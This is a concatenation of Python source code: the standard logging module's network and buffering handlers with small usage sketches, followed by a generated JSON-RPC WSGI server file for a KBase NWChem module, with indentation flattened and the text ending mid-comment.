class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
LOG_EMERG = 0
LOG_ALERT = 1
LOG_CRIT = 2
LOG_ERR = 3
LOG_WARNING = 4
LOG_NOTICE = 5
LOG_INFO = 6
LOG_DEBUG = 7
LOG_KERN = 0
LOG_USER = 1
LOG_MAIL = 2
LOG_DAEMON = 3
LOG_AUTH = 4
LOG_SYSLOG = 5
LOG_LPR = 6
LOG_NEWS = 7
LOG_UUCP = 8
LOG_CRON = 9
LOG_AUTHPRIV = 10
LOG_FTP = 11
LOG_LOCAL0 = 16
LOG_LOCAL1 = 17
LOG_LOCAL2 = 18
LOG_LOCAL3 = 19
LOG_LOCAL4 = 20
LOG_LOCAL5 = 21
LOG_LOCAL6 = 22
LOG_LOCAL7 = 23
priority_names = {'alert': LOG_ALERT, 'crit': LOG_CRIT, 'critical':
LOG_CRIT, 'debug': LOG_DEBUG, 'emerg': LOG_EMERG, 'err': LOG_ERR,
'error': LOG_ERR, 'info': LOG_INFO, 'notice': LOG_NOTICE, 'panic':
LOG_EMERG, 'warn': LOG_WARNING, 'warning': LOG_WARNING}
facility_names = {'auth': LOG_AUTH, 'authpriv': LOG_AUTHPRIV, 'cron':
LOG_CRON, 'daemon': LOG_DAEMON, 'ftp': LOG_FTP, 'kern': LOG_KERN,
'lpr': LOG_LPR, 'mail': LOG_MAIL, 'news': LOG_NEWS, 'security':
LOG_AUTH, 'syslog': LOG_SYSLOG, 'user': LOG_USER, 'uucp': LOG_UUCP,
'local0': LOG_LOCAL0, 'local1': LOG_LOCAL1, 'local2': LOG_LOCAL2,
'local3': LOG_LOCAL3, 'local4': LOG_LOCAL4, 'local5': LOG_LOCAL5,
'local6': LOG_LOCAL6, 'local7': LOG_LOCAL7}
priority_map = {'DEBUG': 'debug', 'INFO': 'info', 'WARNING': 'warning',
'ERROR': 'error', 'CRITICAL': 'critical'}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT), facility=
LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError('getaddrinfo returns an empty list')
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return facility << 3 | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, 'warning')
ident = ''
append_nul = True
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\x00'
prio = '<%d>' % self.encodePriority(self.facility, self.
mapPriority(record.levelname))
prio = prio.encode('utf-8')
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
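# Illustrative usage sketch (not part of the original module): send records
# to a local syslog daemon. The '/dev/log' socket path is an assumption
# (platform dependent), and LOG_USER is just one facility choice.
def _example_syslog_handler():
    handler = SysLogHandler(address='/dev/log',
                            facility=SysLogHandler.LOG_USER)
    handler.setFormatter(logging.Formatter('%(name)s: %(message)s'))
    logger = logging.getLogger('syslog-demo')
    logger.addHandler(handler)
    logger.warning('delivered with the user facility at warning priority')
    handler.close()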
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject, credentials=
None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is 5 seconds).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
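# Illustrative usage sketch (not part of the original module): email only
# CRITICAL records. The mail host, addresses and credentials below are
# placeholders, not real servers or accounts.
def _example_smtp_handler():
    handler = SMTPHandler(mailhost=('smtp.example.org', 587),
                          fromaddr='app@example.org',
                          toaddrs=['ops@example.org'],
                          subject='Application failure',
                          credentials=('user', 'password'),
                          secure=())
    handler.setLevel(logging.CRITICAL)
    logger = logging.getLogger('smtp-demo')
    logger.addHandler(handler)
    logger.critical('one email is sent per CRITICAL record')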
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype='Application'):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], 'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {logging.DEBUG: win32evtlog.
EVENTLOG_INFORMATION_TYPE, logging.INFO: win32evtlog.
EVENTLOG_INFORMATION_TYPE, logging.WARNING: win32evtlog.
EVENTLOG_WARNING_TYPE, logging.ERROR: win32evtlog.
EVENTLOG_ERROR_TYPE, logging.CRITICAL: win32evtlog.
EVENTLOG_ERROR_TYPE}
except ImportError:
print(
'The Python Win32 extensions for NT (service, event logging) appear not to be available.'
)
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method='GET', secure=False, credentials=
None, context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ['GET', 'POST']:
raise ValueError('method must be GET or POST')
if not secure and context is not None:
raise ValueError(
'context parameter only makes sense with secure=True')
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == 'GET':
if url.find('?') >= 0:
sep = '&'
else:
sep = '?'
url = url + '%c%s' % (sep, data)
h.putrequest(self.method, url)
i = host.find(':')
if i >= 0:
host = host[:i]
h.putheader('Host', host)
if self.method == 'POST':
h.putheader('Content-type', 'application/x-www-form-urlencoded'
)
h.putheader('Content-length', str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == 'POST':
h.send(data.encode('utf-8'))
h.getresponse()
except Exception:
self.handleError(record)
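# Illustrative usage sketch (not part of the original module): POST each
# record's attribute dict to a web endpoint. The host and URL are
# placeholders; the endpoint must accept form-encoded data.
def _example_http_handler():
    handler = HTTPHandler('logs.example.org:8080', '/log', method='POST')
    logger = logging.getLogger('http-demo')
    logger.addHandler(handler)
    logger.error('record attributes are sent as percent-encoded form fields')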
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever a
record is added to the buffer, a check is made to see if the buffer
should be flushed. If it should, then flush() is expected to do what's
needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return len(self.buffer) >= self.capacity
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return len(self.buffer
) >= self.capacity or record.levelno >= self.flushLevel
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
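# Illustrative usage sketch (not part of the original module): buffer up to
# 100 records in memory and flush them to a file only when an ERROR (or the
# capacity limit) is reached. The file name is an assumption.
def _example_memory_handler(path='buffered.log'):
    target = logging.FileHandler(path)
    handler = MemoryHandler(capacity=100, flushLevel=logging.ERROR,
                            target=target)
    logger = logging.getLogger('memory-demo')
    logger.setLevel(logging.DEBUG)
    logger.addHandler(handler)
    logger.debug('buffered, nothing written yet')
    logger.error('this record triggers a flush of the whole buffer')
    handler.close()
    target.close()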
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
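# Illustrative usage sketch (not part of the original module): the usual
# QueueHandler/QueueListener pairing. Callers log through the queue; a
# single listener thread forwards the records to the real handlers.
def _example_queue_logging():
    import queue as _queue
    q = _queue.Queue(-1)
    listener = QueueListener(q, logging.StreamHandler(),
                             respect_handler_level=True)
    listener.start()
    logger = logging.getLogger('queue-demo')
    logger.setLevel(logging.DEBUG)
    logger.addHandler(QueueHandler(q))
    logger.info('handled on the listener thread, not on the caller')
    listener.stop()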
|
NWChemKbaseServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from NWChemKbase.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'NWChemKbase'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from NWChemKbase.NWChemKbaseImpl import NWChemKbase # noqa @IgnorePep8
impl_NWChemKbase = NWChemKbase(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
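# Illustrative sketch (not part of the generated server): call a registered
# method directly through the service object, bypassing WSGI. The request
# dict mirrors what Application builds from the HTTP body; the method name
# and params are placeholders for whatever has been registered.
def _example_direct_call(service, ctx):
    req = {'version': '1.1',
           'id': '42',
           'method': 'NWChemKbase.status',
           'params': []}
    return service.call_py(ctx, req)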
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'NWChemKbase'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_NWChemKbase.run_NWChemKbase,
name='NWChemKbase.run_NWChemKbase',
types=[dict])
self.method_authentication['NWChemKbase.run_NWChemKbase'] = 'required' # noqa
self.rpc_service.add(impl_NWChemKbase.status,
name='NWChemKbase.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'NWChemKbase ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run it with the single threaded Python WSGI reference server
